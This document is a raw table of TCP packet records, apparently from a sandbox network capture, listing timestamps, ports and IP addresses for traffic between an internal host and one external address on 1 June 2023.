Jun 1, 2023 22:36:40.923506021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923557043 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923626900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923636913 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.923685074 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923696041 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923707008 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923727036 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923737049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923748970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.923816919 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.923818111 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.923959970 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.924436092 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924545050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924629927 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924642086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924676895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924689054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924699068 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924710035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924737930 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.924793959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.924921989 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.924921989 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.925268888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925388098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925425053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.925450087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925462008 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925474882 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925489902 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925502062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925545931 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925559998 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.925559998 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.925657988 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.925672054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.925740004 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.925848007 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.926101923 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926211119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926268101 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926280022 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926290989 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926332951 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926352024 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.926397085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926402092 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.926414013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926431894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926444054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.926486969 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.926536083 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.926584959 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.927037001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927167892 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927309990 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.927419901 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927520037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927573919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927587032 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927642107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927656889 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.927695990 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927711010 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.927800894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927836895 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.927947044 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927959919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927972078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.927983999 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.928097010 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.928230047 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.928348064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.928457975 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.943610907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943654060 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943711996 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943758965 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.943773031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943787098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943799973 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943841934 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943896055 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943907976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943918943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943936110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.943945885 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.943945885 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.943950891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944005013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944016933 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944040060 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944051981 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944062948 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944103003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944113970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944128036 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944163084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944176912 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944201946 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944214106 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944224119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944235086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944253922 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944253922 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944258928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944274902 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944287062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944304943 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944308043 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944308996 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944323063 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944334984 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944359064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944370985 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944381952 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944394112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944412947 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944425106 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944432020 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944439888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944454908 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944466114 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.944529057 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944627047 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.944675922 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.945113897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945162058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945224047 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945280075 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945291042 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945302010 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945321083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945332050 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945341110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945477009 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945532084 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945544958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945555925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945574999 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945585966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945596933 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945632935 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.945636988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945652008 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945664883 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945683002 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945693970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945703983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945722103 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.945741892 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945754051 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945797920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945807934 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.945811987 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945830107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945841074 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945852995 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.945856094 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.945949078 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.946048021 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.946384907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946435928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946505070 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946559906 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946572065 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946583033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946600914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946611881 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946664095 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946676016 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946686983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946697950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946702957 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.946755886 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946810007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946820974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946831942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946854115 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946865082 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946876049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.946885109 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.946885109 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.946891069 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947065115 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.947065115 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.947321892 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947372913 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947443008 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947503090 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947514057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947525024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947545052 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947556019 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947566986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947577953 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947652102 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.947653055 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.947653055 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.947779894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947792053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947837114 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.947875023 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947933912 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947945118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947956085 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947978973 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.947989941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948000908 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948013067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948029995 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948050976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948064089 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948081017 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948081970 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948082924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948098898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948110104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948128939 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948129892 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948144913 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948156118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948167086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948196888 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948209047 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948224068 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948224068 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948224068 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948321104 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.948859930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948911905 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.948976040 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949033022 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949043989 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949054956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949078083 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949079037 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949094057 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949105024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949126005 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949127913 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949141979 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949153900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949166059 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949176073 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949176073 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949193001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949204922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949215889 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949224949 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949239016 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949249983 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949260950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949273109 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949274063 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949274063 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949289083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949372053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949372053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949372053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949517965 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949620962 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949737072 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949793100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949805021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949815035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949834108 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949845076 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949856043 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.949969053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949969053 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.949992895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950115919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950170040 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950181961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950192928 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950252056 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950304031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950315952 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950325966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950329065 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.950354099 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950366020 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950376987 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950391054 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.950402021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950413942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950426102 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950438023 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950462103 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950474024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950484991 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950489998 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.950501919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950514078 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950525045 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.950562954 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.950651884 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.961838961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.961955070 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.961978912 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.961991072 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.962002039 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.962012053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.962028027 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.962038994 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:40.962119102 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:40.962218046 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.035578012 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.035748959 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.053920031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.053934097 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054007053 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054018974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054140091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054152966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054166079 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054188967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054199934 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054210901 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.054213047 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054235935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054246902 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.054259062 CEST	2537	49850	45.66.230.155	192.168.11.20
